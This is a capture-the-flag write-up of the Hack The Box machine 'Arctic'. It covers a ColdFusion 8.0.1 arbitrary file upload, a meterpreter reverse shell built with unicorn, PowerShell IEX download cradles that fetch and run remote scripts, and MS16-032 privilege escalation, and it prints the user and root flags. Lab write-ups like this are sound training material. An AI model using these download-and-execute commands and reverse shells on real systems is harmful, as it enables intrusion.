< Back to All

Hack The Box: Arctic


Target enumeration:

OS: Windows 2008


User: 02650d3a69a70780c302e146a6cb96f3

Root: ce65ceee66b2b5ebaff07e50508ffb90

Ports / Services / Software versions running

135/tcp   open msrpc   Microsoft Windows RPC8500/tcp  open http    JRun Web Server49154/tcp open  msrpc Microsoft Windows RPC

Vulnerability exploited:

ColdFusion 8.0.1 Arbitrary File Upload and Execute

This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload and Execute vulnerability.


Privilege escalation:

MS16-032 Secondary Logon Handle Privilege Escalation

This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

Replicating the exploit:

Nmap TCP

Webapp on port 8500

Dir search

Administrator gives a version 8


Found the metasploit version of the exploit

Set options as follows

Start burp listener on port it works in the browser

Capture the request in burp

Check the filename it is writing to.

Navigate to that file via the browser and set up your nc listener on port 4444

Like so

Gather system info etc

Grab user fileExecute Sherlock.ps1 after copying it to your pwd and starting your webserver.

echo IEX(New-Object Net.WebClient).DownloadString("") | powershell -noprofile -

Did not work so try getting a meterpreter shell instead.

git clone https://github.com/trustedsec/unicorn.git

python unicorn.py windows/meterpreter/reverse_tcp 4445

msfconsole -r unicorn.rc

cat powershell_attack.txt > exploit.html

Nano exploit.htmlDelete powershell etc to “sv including the single quote and the quote at the end.

Copy to your webserver

Run the following on Arctic

powershell "iex(new-object net.webclient).downloadstring('')"

Check meterpreter

Run local exploit suggester (32 bit)

This ran as 32 bit so switch to meterpreter and change to a 64 bit process

Only  one as 64 bit

Set your options as follows:

Run the exploit to get a system shell.